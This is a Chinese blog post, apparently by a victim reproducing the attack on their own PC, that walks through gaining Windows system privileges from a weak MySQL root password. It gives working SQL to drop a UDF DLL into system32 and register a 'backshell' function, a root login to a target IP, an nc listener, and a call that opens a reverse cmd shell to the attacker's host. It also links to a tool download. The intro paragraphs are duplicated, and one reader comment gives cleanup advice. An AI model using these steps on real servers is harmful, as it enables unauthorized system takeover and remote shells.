分类
Windows安全

Mysql弱口令取得系统权限(续)

春节期间电脑由于Mysql弱口令导致系统被入侵,这两天一直在模拟入侵过程。在网上查阅了好多资料,也问了几个网友,最终成功地利用Mysql弱口令入侵了我自己的电脑。

前面的入侵过程没有问题,问题出在了那个my_udf.dll文件上,我判断可能是由于数据库版本的不同,新版本的数据库已经不再支持my_udf.dll文件函数造成的。之前还到处下载my_udf.dll这个文件,其实这个文件已经不能用了。

后来在网上搜索到了Langouster写的Langouster_udf.Dll_专用PHP网马,这个是东东是webshell提权的时候用到的,用的时候需要将php文件上传到webshell空间,如果没有webshell只有Mysql密码,那么我们可以利用网马中带的二进制dll文件来代替my_udf.dll。

下面是我模拟Mysql弱口令取得系统权限详细步骤

春节期间电脑由于Mysql弱口令导致系统被入侵,这两天一直在模拟入侵过程。在网上查阅了好多资料,也问了几个网友,最终成功地利用Mysql弱口令入侵了我自己的电脑。

前面的入侵过程没有问题,问题出在了那个my_udf.dll文件上,我判断可能是由于数据库版本的不同,新版本的数据库已经不再支持my_udf.dll文件函数造成的。之前还到处下载my_udf.dll这个文件,其实这个文件已经不能用了。

后来在网上搜索到了Langouster写的Langouster_udf.Dll_专用PHP网马,这个是东东是webshell提权的时候用到的,用的时候需要将php文件上传到webshell空间,那么我们可以利用网马中带的二进制dll文件来代替my_udf.dll。

下面是我模拟Mysql弱口令取得系统权限详细步骤:

1.修改mysql.txt文件 因为不同的dll文件可用的函数名称不一样

简单解释一下,第一行是指使用mysql这个数据库自带的库,后面连续的内容是dll文件的二进制形式。

create table Ghost(data LONGBLOB);
insert into Ghost values("");update Ghost set data = @a;
select data from Ghost into DUMPFILE 'c:\\windows\\system32\\udf.dll';

这几行的功能是将dll文件通过mysql客户端上传到目标电脑的硬盘上。

CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';
select backshell('');

这两行是Langouster写的Langouster_udf.dll文件的函数调用方法,当然还有其他的函数,我在这里用的是反弹cmd。

2.利用Mysql客户端实现入侵

连接远程电脑的Mysql数据库 mysql -u root -h 192.168.0.234 – p 这个ip为目标电脑的ip

输入密码后转到mysql>

在提示符下直接输入 \. c:\mysql.txt 回车

3.在本地用nc监听反弹端口 nc -l -p 33333 这个端口是随便填的 但要记住在数据库执行backshell函数时要填这个端口。

4.执行backshell函数反弹cmd 在mysql> 下输入:select backshell(“自己电脑ip”,33333);

按以上步骤就可以得到目标电脑的系统权限了。

后记:这个dll文件会被杀毒软件杀掉,还有就是不同的dll文件执行函数名称也不同。

Mysql弱口令取得系统权限工具下载 解压密码:www.fendou.info

“Mysql弱口令取得系统权限(续)”上的21条回复

奋斗,记得曾经还在你这找了几个蛮实用的帖子
加个友情链接吧
郭海波,乘风归来兮
http://www.guohaibo.com

06年曾经有段时间我很压抑,想做个网站叫郁闷网,后来焕发了工作了热情,考虑做个“奋斗”,最后到去年年底还是做了自己的实名,现在少了很多激情,曾经一周至少三次大运动,现在三月没有一次…
乘风归来,青春不再,奋斗依旧!

如果确认是因为弱口令被入侵,可以检查一下数据库中有没有陌生的表,查看一下表中数据的内容,如果有类似这样的内容c:\\windows\\system32\\udf.dll 直接找到这个文件删除并删除这个新建的表,最后修改mysql的密码就可以了。

发表评论

邮箱地址不会被公开。 必填项已用*标注